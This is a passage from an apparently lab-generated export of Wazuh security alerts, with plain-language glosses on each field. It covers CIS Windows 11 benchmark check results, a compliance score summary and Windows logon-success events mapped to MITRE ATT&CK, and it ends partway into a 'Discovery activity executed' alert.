No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:47.759+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:47.759+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19013
Numeric ID of the detection rule that fired.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.7.4']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534507.2135547
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26164
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory determines whether the operating system generates audit events when changes are made to policy rules for the Microsoft Protection Service (MPSSVC.exe). Events for this subcategory include: - 4944: The following policy was active when the Windows Firewall started. - 4945: A rule was listed when the Windows Firewall started. - 4946: A change has been made to Windows Firewall exception list. A rule was added. - 4947: A change has been made to Windows Firewall exception list. A rule was modified. - 4948: A change has been made to Windows Firewall exception list. A rule was deleted. - 4949: Windows Firewall settings were restored to the default values. - 4950: A Windows Firewall setting has changed. - 4951: A rule has been ignored because its major version number was not recognized by Windows Firewall. - 4952: Parts of a rule have been ignored because its minor version number was not recognized by Windows Firewall. The other parts of the rule will be enforced. - 4953: A rule has been ignored by Windows Firewall because it could not parse the rule. - 4954: Windows Firewall Group Policy settings have changed. The new settings have been applied. - 4956: Windows Firewall has changed the active profile. - 4957: Windows Firewall did not apply the following rule. - 4958: Windows Firewall did not apply the following rule because the rule referred to items not configured on this computer. The recommended state for this setting is : Success and Failure
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Changes to firewall rules are important for understanding the security state of the computer and how well it is protected against network attacks.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit MPSSVC Rule-Level Policy Change
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.7.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"MPSSVC Rule-Level Policy Change"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
PASS or FAIL. Red = needs fixing.

data.sca.check.reason:  Timeout overtaken running command 'auditpol.exe /get /subcategory:"MPSSVC Rule-Level Policy Change"'
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.previous_result:  failed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:49.319+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:49.319+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  60
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534509.2141014
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:41.9709687Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43895
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  15764
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

SCA summary: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Score less than 50% (32)

🧠 What happened? SCA summary: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Score less than 50% (32)

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:58.036+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:58.036+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  SCA summary: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Score less than 50% (32)
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19004
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534518.2148353
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  summary
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.description:  This document provides prescriptive guidance for establishing a secure configuration posture for Microsoft Windows 11.
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.policy_id:  cis_win11_enterprise_21H2
Internal numeric ID for that policy.

data.sca.passed:  121
Checks that were green – a quick confidence boost.

data.sca.failed:  249
Number of failed checks in the scan. Lots of red means poor hygiene.

data.sca.invalid:  25
Checks that couldn’t run (permissions, missing file, etc.).

data.sca.total_checks:  395
Total tests executed this run.

data.sca.score:  32
Overall compliance score 0‑100%. Under 85% usually needs remediation.

data.sca.file:  cis_win11_enterprise.yml
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from 'not applicable' to failed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from 'not applicable' to failed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:58.866+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:58.866+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from 'not applicable' to failed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19014
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['1.1.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['5.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534518.2149670
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26000
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Enforce password history' is set to '24 or more password(s)'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting determines the number of renewed, unique passwords that have to be associated with a user account before you can reuse an old password. The value for this policy setting must be between 0 and 24 passwords. The default value for Windows Vista is 0 passwords, but the default setting in a domain is 24 passwords. To maintain the effectiveness of this policy setting, use the Minimum password age setting to prevent users from repeatedly changing their password. The recommended state for this setting is: 24 or more password(s). Note: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center. Note #2: As of the publication of this benchmark, Microsoft currently has a maximum limit of 24 saved passwords. For more information, please visit Enforce password history (Windows 10) - Windows security | Microsoft Docs
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  The longer a user uses the same password, the greater the chance that an attacker can determine the password through brute force attacks. Also, any accounts that may have been compromised will remain exploitable for as long as the password is left unchanged. If password changes are required but password reuse is not prevented, or if users continually reuse a small number of passwords, the effectiveness of a good password policy is greatly reduced. If you specify a low number for this policy setting, users will be able to use the same small number of passwords repeatedly. If you do not also configure the Minimum password age setting, users might repeatedly change their passwords until they can reuse their original password.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to 24 or more password(s): Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Enforce password history
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  1.1.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  5.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['net.exe accounts']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:59.080+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:59.080+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  61
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534519.2155758
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:56.4609484Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43897
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  2444
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

